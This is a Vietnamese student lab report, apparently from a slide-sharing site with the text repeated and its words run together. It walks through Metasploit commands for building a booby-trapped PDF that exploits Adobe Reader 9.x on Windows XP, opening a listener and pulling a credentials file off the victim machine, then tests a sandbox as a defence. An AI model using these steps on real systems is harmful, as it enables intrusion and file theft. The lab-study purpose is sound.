ݺߣ

ݺߣShare a Scribd company logo

đề Tài

Download as DOCX, PDF
Anh Bình
Anh Bình
1 of 12
Download to read offline
Đềtài :NghiênCứuchứcnăng backtrack đểkiểmtra an ninhmạng Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng
Nội Dung bàibáocáo - Hướngdẫntấncôngmắc victim bằng file pdf qua lỗicủaadobe_reader 9.x trênnền win xp - Hướngdẫncáchkhắcphụcsựcốkhimáytínhmắcphảilỗitrên Cáccôngcụhỗtrợđểlàmbài - 2 máyảo: Máybacktrack :chuẩnbị 1 file pdf Máyxp :cócàiđặtphầnmêmadobe_reader 9.x , phầnmềm sandbox đểkhắcphụclỗi ( máyxpsẽđượccoilàmáy victim màchúng ta sẽtấncông )
Mụclục Table of Contents Phần I : Hướng dẫn tấn công máy victim .....................................................................................................1 Phần II : Hướng Dẫn cách khắc phục ...........................................................................................................7
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 1Hướng dẫn tấn công máy victim bằng file pdf PhầnI :Hướngdẫntấncôngmáy victim - Gõlệnhmsfconsoleđểkhởiđộngmetaploit - Vìđâylàlỗitrongmang LAN nênyêucầuipmáy backtrack phảicùnglớpvới IP máy victim - Gõlệnhifconfigđểxem IP
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 2Hướng dẫn tấn công máy victim bằng file pdf - Ta dùnglệnhipconfigđểxem IP máy victim - Sauđó ping địachỉ IP máy backtrack xemnóthấynhay hay không - Saukhimetaploitkhởiđộngxong , gõtiếpcâulệnh : Use exploit/windows/fileformat/adobe_pdf_embedded_exe( đểchọnlỗimà ta sẽdùngđểtấncông ) - Gõtiếp : show options
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 3Hướng dẫn tấn công máy victim bằng file pdf - Saukhi show options , nósẽđưaracácthông tin vềlỗimàchúng ta dùng - Set filename : nghĩalàđặttêncho file chứamãđọc - Set infilename : chuyểnđổitừ file pdf màchúng ta chuẩnbịtừtrước - Set payload : kiểutấncông - Set Lhost : gõipmáymìnhvào ( ở đâylà 192.168.183.128 ) - Dùnglệnh exploit đểthựcthi
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 4Hướng dẫn tấn công máy victim bằng file pdf - cp /root/.msf4/local/hack.pdf /root/Desktop : câulệnhnàysẽtạora 1 file pdf chứamãđọccótênlà hack.pdf , vànóđượcđặtngayngoài Desktop - use exploit/multi/handler : tạo 1 phiênlắngnghe - Set lạilhost ( với IP giống IP màchúng ta sét ở trên ) rồisauđó exploit làxong - Chỉcầngửi file chứamãđọcđếnmáynạnnhân , khinạnnhânmở file nósẽyêucầu save lại , rồihỏicómuốn open hay ko , chỉcầnnhấn open thìmáysẽbịtấncông
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 5Hướng dẫn tấn công máy victim bằng file pdf - Máy backtrack đãxâmnhậpthànhcông , vànógửi 1 file ( 752128 byte ) đếnmáy victim - Ta dùnglệnh : cd C:/ ( lệnhnàysẽ di chuyểnđến ổ C củamáy victim ) - Dùnglệnh : ls ( liệtkêtấtcảcáctập tin trong ổ C )
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 6Hướng dẫn tấn công máy victim bằng file pdf - Trênmáy victim ta vào ổ C tạo 1 file tên taikhoan.txt ( nội dung trong file là id : tho pass:123456 ) - Trênmáy backtrack dùnglệnhlsđểliệtkêlạithìthấy file taikhoan.txt - Dùnglệnh : download C:/taikhoan.txt /root/Desktop/ ( câulệnhnàysẽ download file taikhoan.txt từ ổ C củamáy victim vàđặttrên Desktop củachúng ta )
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 7Hướng dẫn tấn công máy victim bằng file pdf PhầnII :HướngDẫncáchkhắcphục - Tảiphầnmêm sandbox vềmáy - Sauđó ta tiếnhànhcàiđặt , vàđâylàgiaodiệncủaphầnmềm sandbox
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 8Hướng dẫn tấn công máy victim bằng file pdf - Nếubạnnghingờ file nàokhôngđáng tin cậythìbạnbỏvàotrong , ở đây ta sẽchạy file hack.pdf khinãy - Ở đâychỉmở file hack.pdf , nhưngnóđãtựđộngmởthêm 1 sốcáikhác - Máy backtrack vẫnxâmnhậpvàomáy victim bìnhthường - Dùnglệnh : cd C:/ ( để di chuyểnđến ổ C củamáy victim ) - Sauđóthửdùnglệnh : upload /root/Desktop/file.pdf C:/ ( ta sẽ send 1 file cótên file.pdf đếnmáy victim )
Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 9Hướng dẫn tấn công máy victim bằng file pdf - Câulệnhvẫnchạy OK nhưngbênmáy victim thìkhôngthấy file.pdf mà backtrack đãgửi qua - Trênmáy backtrack ta dùnglệnh : ls - Nóđãliệtkêtấtcảcácthưmụctrong ổ C luôncả file.pdf màkhinãyđãgửimặcdùtrênmáy victim thìkhôngnhậnđược

More Related Content

đề Tài

  • 1. Đềtài :NghiênCứuchứcnăng backtrack đểkiểmtra an ninhmạng Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng
  • 2. Nội Dung bàibáocáo - Hướngdẫntấncôngmắc victim bằng file pdf qua lỗicủaadobe_reader 9.x trênnền win xp - Hướngdẫncáchkhắcphụcsựcốkhimáytínhmắcphảilỗitrên Cáccôngcụhỗtrợđểlàmbài - 2 máyảo: Máybacktrack :chuẩnbị 1 file pdf Máyxp :cócàiđặtphầnmêmadobe_reader 9.x , phầnmềm sandbox đểkhắcphụclỗi ( máyxpsẽđượccoilàmáy victim màchúng ta sẽtấncông )
  • 3. Mụclục Table of Contents Phần I : Hướng dẫn tấn công máy victim .....................................................................................................1 Phần II : Hướng Dẫn cách khắc phục ...........................................................................................................7
  • 4. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 1Hướng dẫn tấn công máy victim bằng file pdf PhầnI :Hướngdẫntấncôngmáy victim - Gõlệnhmsfconsoleđểkhởiđộngmetaploit - Vìđâylàlỗitrongmang LAN nênyêucầuipmáy backtrack phảicùnglớpvới IP máy victim - Gõlệnhifconfigđểxem IP
  • 5. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 2Hướng dẫn tấn công máy victim bằng file pdf - Ta dùnglệnhipconfigđểxem IP máy victim - Sauđó ping địachỉ IP máy backtrack xemnóthấynhay hay không - Saukhimetaploitkhởiđộngxong , gõtiếpcâulệnh : Use exploit/windows/fileformat/adobe_pdf_embedded_exe( đểchọnlỗimà ta sẽdùngđểtấncông ) - Gõtiếp : show options
  • 6. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 3Hướng dẫn tấn công máy victim bằng file pdf - Saukhi show options , nósẽđưaracácthông tin vềlỗimàchúng ta dùng - Set filename : nghĩalàđặttêncho file chứamãđọc - Set infilename : chuyểnđổitừ file pdf màchúng ta chuẩnbịtừtrước - Set payload : kiểutấncông - Set Lhost : gõipmáymìnhvào ( ở đâylà 192.168.183.128 ) - Dùnglệnh exploit đểthựcthi
  • 7. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 4Hướng dẫn tấn công máy victim bằng file pdf - cp /root/.msf4/local/hack.pdf /root/Desktop : câulệnhnàysẽtạora 1 file pdf chứamãđọccótênlà hack.pdf , vànóđượcđặtngayngoài Desktop - use exploit/multi/handler : tạo 1 phiênlắngnghe - Set lạilhost ( với IP giống IP màchúng ta sét ở trên ) rồisauđó exploit làxong - Chỉcầngửi file chứamãđọcđếnmáynạnnhân , khinạnnhânmở file nósẽyêucầu save lại , rồihỏicómuốn open hay ko , chỉcầnnhấn open thìmáysẽbịtấncông
  • 8. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 5Hướng dẫn tấn công máy victim bằng file pdf - Máy backtrack đãxâmnhậpthànhcông , vànógửi 1 file ( 752128 byte ) đếnmáy victim - Ta dùnglệnh : cd C:/ ( lệnhnàysẽ di chuyểnđến ổ C củamáy victim ) - Dùnglệnh : ls ( liệtkêtấtcảcáctập tin trong ổ C )
  • 9. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 6Hướng dẫn tấn công máy victim bằng file pdf - Trênmáy victim ta vào ổ C tạo 1 file tên taikhoan.txt ( nội dung trong file là id : tho pass:123456 ) - Trênmáy backtrack dùnglệnhlsđểliệtkêlạithìthấy file taikhoan.txt - Dùnglệnh : download C:/taikhoan.txt /root/Desktop/ ( câulệnhnàysẽ download file taikhoan.txt từ ổ C củamáy victim vàđặttrên Desktop củachúng ta )
  • 10. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 7Hướng dẫn tấn công máy victim bằng file pdf PhầnII :HướngDẫncáchkhắcphục - Tảiphầnmêm sandbox vềmáy - Sauđó ta tiếnhànhcàiđặt , vàđâylàgiaodiệncủaphầnmềm sandbox
  • 11. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 8Hướng dẫn tấn công máy victim bằng file pdf - Nếubạnnghingờ file nàokhôngđáng tin cậythìbạnbỏvàotrong , ở đây ta sẽchạy file hack.pdf khinãy - Ở đâychỉmở file hack.pdf , nhưngnóđãtựđộngmởthêm 1 sốcáikhác - Máy backtrack vẫnxâmnhậpvàomáy victim bìnhthường - Dùnglệnh : cd C:/ ( để di chuyểnđến ổ C củamáy victim ) - Sauđóthửdùnglệnh : upload /root/Desktop/file.pdf C:/ ( ta sẽ send 1 file cótên file.pdf đếnmáy victim )
  • 12. Sinhviênthựchiện :LêVănBình GVHD :VõĐỗThắng 9Hướng dẫn tấn công máy victim bằng file pdf - Câulệnhvẫnchạy OK nhưngbênmáy victim thìkhôngthấy file.pdf mà backtrack đãgửi qua - Trênmáy backtrack ta dùnglệnh : ls - Nóđãliệtkêtấtcảcácthưmụctrong ổ C luôncả file.pdf màkhinãyđãgửimặcdùtrênmáy victim thìkhôngnhậnđược